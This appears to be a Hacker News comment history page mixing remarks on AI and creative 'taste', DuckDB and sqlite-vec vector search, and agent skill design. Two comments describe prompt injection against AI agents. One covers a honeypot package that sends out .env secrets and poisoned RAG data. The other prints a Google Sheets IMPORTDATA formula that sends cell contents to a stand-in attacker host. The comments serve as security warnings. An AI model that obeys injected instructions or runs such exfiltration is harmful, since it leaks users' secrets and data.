Hacker News | cjonas's comments

There's been a lot of discussion about how, in the future, "taste" will be the only differentiator / moat (I recently watched a good video about the gen-AI music industry), since everything will be trivially easy to recreate. But your vision, how well you execute it, and the nuance involved in getting every minor detail correct are much harder (and something the LLM is exactly average at). I recently experienced this while vibe-coding the duckdb vscode extension "I always wanted". The code is 100% LLM-generated, but I've probably had well over 1000 turns of conversation at this point to make every detail exactly as I want it.

Personally, it feels like taste only buys you time and taste is easy to copy.

I don't know where this leaves us, but it's going to be interesting/scary to live through what seems to be coming.


> Personally, it feels like taste only buys you time and taste is easy to copy.

Why is it easy to copy?

I too have written a tiny essay on this topic (https://emsh.cat/good-taste/) but I don't see how "taste" is easy to copy, at least I haven't been convinced by any of the arguments people chucked at me so far.


Because it's easier to clone someone else's "good taste" by just mimicking their formula / ripping off their exact implementation of a feature/UI. The gap between "first to get it right" and "everyone else catches up" could become non-existent in software. You'd need to continuously innovate (to some degree this has always been the case, but it's the tempo that is changing).

> Why is it easy to copy?

I think music trends would be one historical example of this? With software it's a bit more concrete ("I'll just make my app function EXACTLY like yours does") and there is less protection from the law, unless you manage to weasel your way into a patent.


> Because it's easier to clone someone else's "good taste" by just mimicking their formula / ripping off their exact implementation of a feature/UI.

But then you've only copied one of their choices made by their good taste, not actually copied their taste. If a new situation arises, you won't be able to make the same choice as they would. Basically, it doesn't generalize.


> If a new situation arises, you won't be able to make the same choice as they would.

They won't be able to, but they won't need to either - they can just continue cribbing off the original person, and if they can't, they'll find someone else to crib off.

The point is, for all these people outsourcing their thinking, they will always have someone to crib off.


I get that, but you can just "pin" to someone else's taste and they can effectively never get ahead for more than a few minutes.

I think (and hope) this won't be as big a problem in the arts because "authenticity" matters to most people, but for the software industry it feels very disruptive (assuming the models continue to improve and remain accessible).


> Personally, it feels like taste only buys you time and taste is easy to copy.

No offense, but only someone without taste would say this ;)

Taste is not easy to copy. If that were true then there would be no bad major Hollywood movies in established genres; yet despite hundreds of millions of dollars spent on the formulaic superhero genre, we still get stinkers like Madame Web or Kraven the Hunter.

If you actually try looking at places where people show off their taste--scrolling through the latest songs on Soundcloud being a great source--you realize that people just pump out terrible stuff without realizing it's terrible. This was true pre-AI, and AI hasn't made it any less true.

It's similar to the transition from live instruments to the DAW in the music world. The DAW eliminated all physical training requirements for making music, and opened up massive new worlds for the types of music that could be made. The end result was a handful of great things amidst a sea of garbage.


Just to be clear, I don't feel this is actually the case in the world of music and art, at least as an individual consumer. I would argue the industry & economy rewards it, though.

In software it feels different though. If you build an awesome app and want to charge for it, what stops me from just pointing "Claude Epic 2.5" at it and making a pixel perfect replica?


> If you build an awesome app and want to charge for it, what stops me from just pointing "Claude Epic 2.5" at it and making a pixel perfect replica?

It's the same argument people used to use against open sourcing your code for a SaaS: "If I can just clone the repository and run the service myself, why is there a hosted product?"

There is so much more going on though, from how you run something, to how you react to changes, to how you perpetually keep the spaghetti ball from building up, so improvements don't take longer and longer to implement and break other things.

Even if the original code is the same, two operators of that service can deliver two very different experiences, not to mention what the service will look like in a year.


I would say almost all of these companies do have part of their stack as private IP, but regardless that's a good point...

Hope you're right! I imagine the truth will fall somewhere in between our opinions.


How do you define taste (rough is fine)?

An intuition for what people like.

Inherently subjective, but you can still approximate ‘more or less tasteful’ by how many people respond well to it.


I'd say it's quite the opposite: a deep understanding of what you like, and consequently an understanding of what will make a creation into exactly what you like. (Well, I guess some people can create without understanding, directly expressing their likes.)

Since many of our likes are driven by our shared culture and physiology, many other people will appreciate such a creation (even if they don't understand exactly why they like it). Others will appreciate the depth of nuance and the uniqueness of your creation.

The opposite of taste is the approximated "good" average, which is likeable but just never hits all the right notes, and which is already suffering from sameness fatigue.


It's subjective in the philosophical sense (the subject of the predication is involved with the judgment itself) but that doesn't mean it can't be "right" (and probably more importantly, "wrong").

Is there any way to run the query -> report generation standalone, in-process? Like maybe just outputting the HTML (or using the React components in a project)?

I was looking to add similar report generation to a vscode-extension I've been building[0]

[0](https://github.com/ChuckJonas/duckdb-vscode)


This "single pane" attack isn't really the thing you should be most worried about. Imagine the agent is also connected to run python or create a Google sheet. I send an email asking you to run a report using a honey pot package that as soon as it's imported scans your .env and file systems and posts it to my server. Or if it can run emails, I trick it into passing it into an =import_url in Google sheets (harder but still possible). Maybe this instruction doesn't have to come from the primary input surface where you likely have the strongest guardrails. I could ask you to visit a website, open a PDF or poison your rag database somehow in hopes to hit a weaker sub agent.

All these coding agents should support custom OTel endpoints with full instrumentation (HTTP, MCP, file-system access, etc.).

True. They actually do support basic OTel now, but it's mostly limited to high-level metrics like token usage and session counts. Until that gets fuller, parsing the local files seems to be pretty much the only way to get real observability.

How does this compare to DuckDB's vector capabilities (the vss extension)?

Yeah, there's nothing on that or sqlite-vec (both of which seem like apples-to-apples comparisons).

https://zvec.org/en/docs/benchmarks/


I maintain a fork of sqlite-vec (because there hasn't been activity on the main repo for more than a year): sqlite-vec is great for smaller dimensionality or smaller cardinality datasets, but know that it's brute-force, and query latency scales exactly linearly. You only avoid full table scans if you add filterable columns to your vec0 table and include them in your WHERE clause. There's no probabilistic lookup algorithm in sqlite-vec.
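To illustrate what "brute-force, exactly linear" means here, a tiny pure-Python sketch of the scan (illustrative only, not sqlite-vec's actual C implementation): every query touches every stored row, so doubling the table doubles the latency.

```python
# Pure-Python sketch of a brute-force (linear-scan) nearest-neighbor query.
import math

def knn_brute_force(query, vectors, k=3):
    # Compute the distance to EVERY stored vector: O(n) work per query,
    # which is why latency scales exactly linearly with table size.
    def dist(a, b):
        return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))
    scored = sorted((dist(query, v), i) for i, v in enumerate(vectors))
    return [i for _, i in scored[:k]]

vectors = [[0.0, 0.0], [1.0, 0.0], [0.0, 1.0], [5.0, 5.0]]
print(knn_brute_force([0.1, 0.1], vectors, k=2))  # → [0, 1]
```

An ANN index like HNSW avoids this by walking a graph toward the query instead of scoring every row, trading a little recall for sub-linear lookups.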

You're absolutely right—sqlite-vec currently only supports brute-force search, and its latency does scale linearly with dataset size. We did some rough comparisons using its benchmark tools: on the SIFT dataset, latency was around 100ms; on GIST, it was closer to 1000ms. In contrast, with zvec's HNSW implementation, we get ~1ms latency on SIFT and ~3ms on GIST, while achieving recall@100 of 99.9% on SIFT and 97.7% on GIST.

FWIW "You're absolutely right" broadly declares "a human is not piloting the keyboard"

You're right that we didn't include sqlite-vec in our initial benchmarks—apples-to-apples comparisons are always better. I've actually added basic zvec tests to my fork of sqlite-vec (https://github.com/luoxiaojian/sqlite-vec), so feel free to give it a try. We'll also be publishing a more complete performance comparison in an upcoming blog post—stay tuned!

All these libraries are trying to do too much. The "batteries included" approach makes for great demos, but falls apart for any real application.

I'm curious what makes you say that, because we haven't experienced this. We're being used by a Fortune 1000 fintech in production.

Any specific experience you had, or more specifics on where batteries-included went too far?


I may just be a "doomer", but my current take is we have maybe 3-5 years of decent compensation left to "extract" from our profession. Being an AI "expert" will likely extend that range slightly, but at the cost of being one of the "traitors" that helps build your own replacement (but it will happen with or without you).

This looks really cool for schema migrations but how does it handle updates/inserts if you need to move actual data as part of the migration?


Implementation Notes:

- There's no reason you have to expose the skills through the file system. It's just as easy to add a tool call to load a skill. Just put a skill ID in the instruction metadata, or have a `discover_skills` tool if you want to keep skills out of the instructions altogether.

- Another variation is to put a "skills selector" inference in front of your agent invocation. This inference receives the current inquiry/transcript plus the skills metadata and returns a list of potentially relevant skills. It's the same concept as tool selection, and it can save context bandwidth when there are a large number of skills.
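A minimal sketch of the two ideas above. All the names here (`Skill`, `select_skills`, `load_skill`) are hypothetical, and a keyword match stands in for the cheap selector inference:

```python
# Hypothetical sketch of a `discover_skills`-style flow; the names and the
# keyword matcher are illustrative stand-ins for a real selector inference.
from dataclasses import dataclass

@dataclass
class Skill:
    id: str
    description: str  # lightweight "front matter" shown to the selector
    body: str         # full instructions, loaded only on demand

SKILLS = {
    "pdf-report": Skill("pdf-report", "Generate PDF reports from query results", "...full skill text..."),
    "sql-review": Skill("sql-review", "Review SQL for correctness and performance", "...full skill text..."),
}

def select_skills(transcript: str) -> list[str]:
    """Cheap pre-pass: sees only skill metadata, returns likely-relevant IDs."""
    text = transcript.lower()
    return [s.id for s in SKILLS.values()
            if any(word in text for word in s.description.lower().split())]

def load_skill(skill_id: str) -> str:
    """The tool the agent calls to pull a skill body into context by ID."""
    return SKILLS[skill_id].body

print(select_skills("please generate a quarterly pdf report"))  # → ['pdf-report']
```

Only the selected skills' bodies ever enter the agent's context; the rest stay behind the tool call.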


> Or have a `discover_skills` tool

Yes, treating the "front matter" of a skill and the "function definition" of a tool call as kind of an equivalence class.

This understanding helped me create an LLM-agnostic (and sandboxed) open-skills[1] well before this standardization was proposed.

1. Open-skills: https://github.com/instavm/open-skills


Ya... the number of ways to infiltrate a malicious prompt and exfil data is overwhelming, almost unlimited. Any tool that can hit an arbitrary URL or make a DNS request is basically an exfil path.

I recently did a test of a system that triggered off email and had access to write to Google Sheets. Easy exfil via `IMPORTDATA`, but there are probably hundreds of ways to do it.
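As a concrete illustration of the `IMPORTDATA` path: if the agent can be coaxed into writing a formula shaped roughly like the following into a cell (the domain and cell reference here are placeholders), Google's servers fetch the attacker-controlled URL with the cell's contents appended when the sheet evaluates it — no further action from the user or agent needed:

```
=IMPORTDATA("https://attacker.example/collect?d=" & A1)
```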


Guys, I think we just rediscovered fascism and social engineering. Let's make the torment nexus on the internet!

